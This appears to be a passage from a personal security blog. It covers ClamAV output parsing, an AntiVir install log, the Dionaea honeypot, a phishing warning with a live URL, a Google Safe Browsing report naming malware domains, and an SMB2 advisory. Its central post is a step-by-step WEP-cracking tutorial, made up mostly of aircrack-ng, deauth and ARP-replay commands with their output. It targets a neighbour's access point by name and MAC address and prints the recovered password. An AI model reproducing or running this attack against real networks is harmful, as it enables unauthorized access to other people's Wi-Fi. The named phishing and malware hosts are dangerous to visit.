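    """'Trojan.SdBot-4763' and 'Trojan.SdBot-730' -> 'Trojan.SdBot';
    'W32.Virut.sa' and 'W32.Virut-17' -> 'W32.Virut'."""
    return ".".join(sig.split("-", 1)[0].split(".")[:2])


def family_counts(findings):
    return dict(Counter(family(s) for s in findings.values() if s))


def check_summary(findings, summary):
    """Per-file lines and the summary block must agree, or the output was truncated."""
    infected = sum(s is not None for s in findings.values())
    return {
        "scanned_files": int(summary.get("Scanned files", -1)) == len(findings),
        "infected_files": int(summary.get("Infected files", -1)) == infected,
    }


def stale_database(warnings):
    """An OK verdict from stale signatures is weak evidence; surface that."""
    return any("older than" in w or "outdated" in w for w in warnings)


def attribute(findings, hash_sources):
    """Detected MD5 -> signature plus the IPs that delivered it ([] when unknown)."""
    rows = []
    for path, sig in findings.items():
        if sig is None:
            continue
        md5 = path.rsplit("/", 1)[-1]
        rows.append({"md5": md5, "signature": sig, "sources": hash_sources.get(md5, [])})
    return sorted(rows, key=lambda r: r["md5"])


if __name__ == "__main__":
    f, s, w = parse_clamscan(CLAMSCAN_OUTPUT)
    print("families:", family_counts(f), "| summary consistent:", check_summary(f, s))
    print("signatures stale:", stale_database(w))
    for row in attribute(f, HASH_SOURCES):
        print(row["md5"], row["signature"], row["sources"] or "no submission record")
```

The five files ClamAV called OK are the ones to hold on to rather than discard: with signatures more than a week old, "OK" here means "not yet known", and a rescan after freshclam, or a second engine, is the cheap next step.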
To be continued... lots to learn here,
and also for Dionaea...
==Install==
salax@salax-laptop:~/Downloads$ wget http://dlpe.antivir.com/package/wks_avira/unix/en/pers/antivir_workstation-pers.tar.gz
salax@salax-laptop:~/Downloads/antivir-workstation-pers-3.0.5-12$ sudo ./install
Starting AVIRA AntiVir Workstation (UNIX) 3.0.5-12 installation…
Before installing this software, you must agree to the terms
of the license.
Use the arrow keys to scroll through the license. When you
are finished reading, press 'q' to exit the viewer.
Press <ENTER> to view the license.
Licence agreement Avira AntiVir Personal – Free AntiVirus
===============================================================
Please read through the following software licence agreement. By installing the
software, you explicitly agree to be bound by the conditions of this agreement.
If you do not accept the conditions of this agreement, you may not use the software.
———–8<———–8<—————————–cutted
Do you agree to the license terms? [n] y
creating /usr/lib/AntiVir … done
copying AV_WKS_PERS to /usr/lib/AntiVir/ … done
copying LICENSE to /usr/lib/AntiVir/LICENSE-workstation … done
1) installing AntiVir Core Components (Engine, Savapi and Avupdate)
copying uninstall to /usr/lib/AntiVir/ … done
copying uninstall_smcplugin.sh to /usr/lib/AntiVir/ … done
copying etc/file_list to /usr/lib/AntiVir/ … done
copying etc/dir_list to /usr/lib/AntiVir/ … done
copying etc/run.inf to /usr/lib/AntiVir/ … done
———-8<—————–8<—————-cutted
installation of AntiVir Core Components (Engine, Savapi and Avupdate) complete
2) Configuring updates
An internet updater is available with version 3.0.5-12 of
AVIRA AntiVir Workstation (UNIX). It will ensure that you always have the latest
virus signatures and engine updates.
In order to trigger an update you will need to run the command:
/usr/lib/AntiVir/avupdate --product=Guard
Please read the README file for more information about updating and
which method best suits you.
Would you like to create a link in /usr/sbin for avupdate ? [y]
linking /usr/sbin/avupdate to /usr/lib/AntiVir/avupdate … done
Would you like to setup Engine and Signature updates as cron task ? [y]
Please specify the interval to check.
Recommended values are daily or 2 hours.
available options: d [2] 5
creating Engine/Signature update cronjob … done
Would you like to check for Guard updates once a week ? [n]
setup internet updater complete
3) installing main program
copying doc/avserver_en.pdf to /usr/lib/AntiVir/ … done
stop running AVIRA AntiVir Workstation (UNIX) … done
copying bin/linux_glibc22/libdazuko2.so to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/libdazuko3compat2.so to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avguard-ondemand-mgmt to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avguard-scanner to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avscan to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avsavapi-super to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avguard.bin to /usr/lib/AntiVir/ … done
Dazukofs module is loaded
linking /usr/lib/AntiVir/libdazuko.so to /usr/lib/AntiVir/libdazuko3compat2.so … done
Guard will automatically protect all directories
which are mounted upon dazukofs filesystem.
Please specify at least one directory to be protected
by Guard to add in /etc/fstab : [/home]
The following directories will be protected by Guard:
/home
If you want to remove or include more directories
you will need to edit your /etc/fstab file and remount dazukofs.
backup original /etc/fstab to /etc/fstab.orig
adding DazukoFS IncludePath /home to /etc/fstab … done
Mounting /home as dazukofs…
copying etc/avscan.conf to /etc/avira/ … done
copying etc/avscan.conf to /etc/avira/avscan.conf.default … done
copying script/avira_start.sh.template to /usr/lib/AntiVir/avguard … done
copying script/avguard_start.sh to /usr/lib/AntiVir/ … done
copying script/avguard_restart.sh to /usr/lib/AntiVir/ … done
copying script/avguard_stop.sh to /usr/lib/AntiVir/ … done
copying script/avguard_post.sh to /usr/lib/AntiVir/ … done
copying script/avguardkey_post.sh to /usr/lib/AntiVir/ … done
creating /home/quarantine … already exists
Would you like to install the AVIRA Guard GNOME plugin ? [n] y
installing AVIRA Guard GNOME plugin …
*** Installing pre-compiled applet
done
linking /usr/bin/avscan to /usr/lib/AntiVir/avscan … done
linking /usr/bin/scan to /usr/lib/AntiVir/avscan … done
Would you like to create a link in /usr/sbin for avguard ? [y]
linking /usr/sbin/avguard to /usr/lib/AntiVir/avguard … done
Please specify if boot scripts should be set up.
Set up boot scripts [y]:
setting up boot script … done
installation of AVIRA Guard complete
4) activate SMC support
If you are going to use AVIRA Security Management Center (SMC)
to manage this software remotely you need this
Would you like to activate SMC support? [y] n
SMC will NOT be activated
checking for existing /etc/avira/avguard.conf … not found
copying etc/avguard.conf to /etc/avira/ … done
copying etc/avguard.conf to /etc/avira/avguard.conf.default … done
checking for existing /etc/avira/avguard-scanner.conf … not found
copying etc/avguard-scanner.conf to /etc/avira/ … done
————8<————————–8<—————cutted
Would you like to start AVIRA Guard now? [y] y
Starting AVIRA AntiVir Workstation Personal …
Starting: avguard.bin
Installation of the following features complete:
AntiVir Core Components (Engine, Savapi and Avupdate)
AVIRA Internet Updater
AVIRA Guard
***********************************************************
Configuration files:
/etc/avira/avguard.conf (AVIRA Guard main config)
/etc/avira/avscan.conf (AVIRA Guard avscan config)
/etc/avira/avguard-scanner.conf (AVIRA Guard scanner config)
/etc/avira/avupdate.conf (AVIRA Avupdate options)
***********************************************************
Note: It is highly recommended that you perform an update now to
ensure up-to-date protection. This can be done by running:
/usr/lib/AntiVir/avupdate --product=Guard
Be sure to read the README file for additional information.
Thank you for your interest in AVIRA AntiVir Workstation (UNIX).
Then I rebooted and checked the processes:
root@salax-laptop:~# ps auxwww|grep avira
root 6259 0.5 1.9 45736 39756 pts/0 S 16:04 0:03 /usr/lib/AntiVir/savapi --config=/etc/avira/avguard-scanner.conf --pid-dir=/var/run/avguard/ --temp=/var/run/avguard/savinst-vNPLDw/ -N --allow-remote-shutdown --socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6260 5.2 1.9 46292 39932 pts/0 S 16:04 0:34 /usr/lib/AntiVir/savapi --config=/etc/avira/avguard-scanner.conf --pid-dir=/var/run/avguard/ --temp=/var/run/avguard/savinst-vNPLDw/ -N --allow-remote-shutdown --socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6300 4.8 1.9 46296 39968 pts/0 S 16:08 0:20 /usr/lib/AntiVir/savapi --config=/etc/avira/avguard-scanner.conf --pid-dir=/var/run/avguard/ --temp=/var/run/avguard/savinst-vNPLDw/ -N --allow-remote-shutdown --socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6301 7.7 1.9 46300 39856 pts/0 S 16:08 0:33 /usr/lib/AntiVir/savapi --config=/etc/avira/avguard-scanner.conf --pid-dir=/var/run/avguard/ --temp=/var/run/avguard/savinst-vNPLDw/ -N --allow-remote-shutdown --socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6628 0.0 0.0 3336 804 pts/0 S+ 16:15 0:00 grep avira
Uninstall? Simply:
salax@salax-laptop:~/Downloads/antivir-workstation-pers-3.0.5-12$ sudo ./uninstall
[sudo] password for salax:
uninstall [--product=productname] [--no-interactive] [--force] [--version] [--help]
installed products:
Guard
Scanner
salax@salax-laptop:~/Downloads/antivir-workstation-pers-3.0.5-12$ sudo ./uninstall --product=Guard
Hi there, hope all is well..
Last week, I was given the opportunity to learn about configuring and playing around with Dionaea, the successor to Nepenthes. It's been a great honour for a newbie like me to join the training and learn together with the other staff.
To begin with, I'm actually new to this.. With Nepenthes, I just managed to install and configure the program, and never really had the chance to understand how the program works, and I don't have much experience with it (one of the reasons is that I'm tooo lazy, yes, I admit it :-p). Install, configure, put it on a public IP at my home.. and wait for some alerts to come out..
For Dionaea, I followed the tutorial at their main page http://dionaea.carnivore.it/ and managed to install and configure all the dependencies.. Once installed, I tried testing it with some exploits / nmapping.. cool
It also has an HTTP server under /opt/dionaea/var/dionaea/wwwroot, a fast HTTP server. Frankly speaking, during the training I couldn't catch all of the explanations, the code (since I'm a n00b in programming), and bla bla.. But I'm amazed by how the program works.. they (the developers) must be some kind of beautiful-mind people for developing this ;-p
I did my installation/configuration on top of Ubuntu 9.04.. This shouldn't be a problem for *buntu and Debian users.. other distros I don't know, haven't tried.
If you would like to try it out:
http://dionaea.carnivore.it/
http://carnivore.it/2009/12/02/dionaea_first_tc_kul_12-09 (blog)
Screenshot of Dionaea in action:

This is another example of a phishing site available out there. Users with little knowledge will be tricked into entering their personal data such as account number and PIN number: http://www.classm2u.com/M2ULogin.htm . Beware of phishing sites, since many tend to use Internet Explorer rather than Mozilla Firefox. When I tested opening it using IE 8, it didn't provide any warning. The same goes for the Google Chrome browser. The alert only appears in Mozilla Firefox. Currently, I'm using 3.5.5.


Hi, this simple tutorial is for cracking WEP wifi keys..
My gear:
Lenovo IBM ThinkPad T60 with embedded Intel wireless card (a normal wifi card)
Ubuntu 9.04 32-bit
My practice target:
Wifi AP of my next-door neighbour, a UTP practical student
OK, let's start:
1. First, because this is not BackTrack, I'm going to have to install aircrack-ng:
sudo apt-get install aircrack-ng
Then, use Kismet or 'iwlist' to search or wardrive for wifi access points (in my case I don't wardrive, just sitting in my room).
In this example, I'm using iwlist:
2.
sudo iwlist wlan0 scanning
salax@salax-laptop:~$ sudo iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 – Address: 00:1C:DF:CD:84:74
ESSID:"Soul Society"
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=74/100 Signal level:-60 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 000C536F756C20536F6369657479
IE: Unknown: 010882848B962430486C
IE: Unknown: 030106
IE: Unknown: 2A0100
IE: Unknown: 2F0100
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 32040C121860
IE: Unknown: DD970050F204104A0001101044000
IE: Unknown: DD090010180200F0000000
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=0000001b713e8183
Extra: Last beacon: 460ms ago
Cell 02 – Address: 00:1E:40:DD:81:60
ESSID:"PETRONAS1"
Mode:Master
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=51/100 Signal level:-78 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009504554524F4E415331
IE: Unknown: 010482848B96
IE: Unknown: 03010A
IE: Unknown: DD060010180205F0
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Extra:tsf=00000000b2840fc4
Extra: Last beacon: 328ms ago
Cell 03 – Address: CE:9F:F0:61:B3:05
ESSID:"mariam"
Mode:Ad-Hoc
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=48/100 Signal level:-80 dBm Noise level=-97 dBm
Encryption key:off
IE: Unknown: 00066D617269616D
IE: Unknown: 010882848B960C183048
IE: Unknown: 03010A
IE: Unknown: 06020000
IE: Unknown: 2A0107
IE: Unknown: 32041224606C
IE: Unknown: DD070050F202000100
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000053cd9d3d6
Extra: Last beacon: 280ms ago
Cell 04 – Address: 00:21:91:35:0F:1B
ESSID:"Starbucks"
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009537461726275636B73
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030106
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD0900037F01010060FF7F
IE: Unknown: DD050050F20500
IE: Unknown: DD750050F204104A0001101
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000a10cbf6181
Extra: Last beacon: 472ms ago
Cell 05 – Address: 00:1E:40:66:67:29
ESSID:"Streamyx Mobility"
Mode:Master
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 001153747265616D7978204D6F62696C697479
IE: Unknown: 010882848B962430486C
IE: Unknown: 03010B
IE: Unknown: 2A0104
IE: Unknown: 2F0104
IE: Unknown: 32040C121860
IE: Unknown: DD060010180200F4
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=00000001118f4184
Extra: Last beacon: 136ms ago
OK, look at the output and focus on the channel of your target AP. In this example, I'm choosing channel 10 for my practice.
3. Now, execute the command below:
sudo airodump-ng -w capture -c 10 wlan0
Now you should see something like this:

If you get an error, it means that your wifi adapter is busy / already connected to an AP; run the command below. If you don't have any problem, just proceed with step 7.
4.
sudo airmon-ng start wlan0
and note the mode enabled:
5.
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)
This actually creates another interface, mon0.
6. If you had the previous error, run it again with the new interface:
sudo airodump-ng -w capture -c 10 mon0
If you didn't have the error, just proceed with wlan0.
Leave it running for a while. Focus on the MAC address of your desired AP and notice the data count increasing.
7. Now, open a new tab in the console and type:
sudo aireplay-ng -e PETRONAS1 -a 00:1E:40:DD:81:60 -c 00:19:D2:00:E6:37 --deauth 10 wlan0
-a 00:1E:40:DD:81:60 : MAC address of the targeted AP (PETRONAS1)
-c 00:19:D2:00:E6:37 : MAC address of a machine connected to the targeted AP (this can be seen in airodump in the previous tab).
From this command, you can see the output:

8. Then, open another tab and type:
sudo aireplay-ng --arpreplay -b 00:1E:40:DD:81:60 -h 00:19:D2:00:E6:37 wlan0
-b 00:1E:40:DD:81:60 : MAC address of the targeted AP
-h 00:19:D2:00:E6:37 : MAC address of the machine connected to the AP
Run the command and we can see it searching for packets. Here you can see the connection between the targeted AP and the machine connected to it:

9. Lastly, open another tab and type:
sudo aircrack-ng -f 4 -m 00:1E:40:DD:81:60 -n 128 capture.cap
-m 00:1E:40:DD:81:60 : the targeted MAC address
Here, I'm using 128-bit key encryption, assuming you know, guess or search for the target's WEP key length. Below is aircrack pwning/decoding the key:

10. Let it run and leave it until it finds the key / the captured packets are enough to decrypt
the key password. The longer/more complicated the passphrase, the more time it takes to crack it.. So in my case, I waited for about 10 minutes.. Lucky me
Password : petronas12345
P/S: this is for educational purposes; my neighbour has been informed about this and they have changed their passphrase to a new and stronger password key.

Now, to test it, try to connect:
Success!
Here we see how a simple and lame passphrase can be abused by others. So make it long and complicated, not easy to guess. (One caveat: the aircrack-ng run above is a statistical attack on WEP itself and succeeds against any WEP key once enough IVs have been captured, so the lasting fix is to move the AP to WPA2, not just to pick a longer WEP key.)
If your Internet connection is slow, someone is riding behind you
I've encountered a website (a forum) which the Google Chrome browser declared as containing malware. Funny, not in Firefox.. IE? lol
The output from Google Safe Browsing:
Safe Browsing
Diagnostic page for www.webdirectory.com.my
What is the current listing status for www.webdirectory.com.my?
Site is listed as suspicious – visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 254 pages we tested on the site over the past 90 days, 32 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-10-29, and the last time suspicious content was found on this site was on 2009-10-21.
Malicious software is hosted on 6 domain(s), including stone-sour.cn/, alinaturu.info/, guardpconline.com/.
4 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including waveevolution.com/, alinaturu.info/, designblogger.cn/.
This site was hosted on 1 network(s) including AS17971 (EASTGATE).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, www.webdirectory.com.my did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
I know this alert has been out for about a month.. but I'm pretty sure MANY of the Windows users out there are not aware of it. This is still 'panas' (hot), as many of those who know about it will try it on the local network to see the results.
If you think you are not affected, think again. List of Windows operating systems that are vulnerable:
* Windows Vista Service Pack 0, Service Pack 1 and Service Pack 2
* Windows Vista x64 Edition Service Pack 0, Service Pack 1 and Service Pack 2
* Windows Server 2008 for 32-bit Systems Service Pack 0 and Service Pack 2
* Windows Server 2008 for x64-based Systems, Service Pack 0 and Service Pack 2
* Windows Server 2008 for Itanium-based, Service Pack 0 and Service Pack 2
This probably includes the Windows 7 versions. Users are advised to follow the steps here
or install the fix by Microsoft here.
As shown here, my friend's link shows the exploit being done.. you've been warned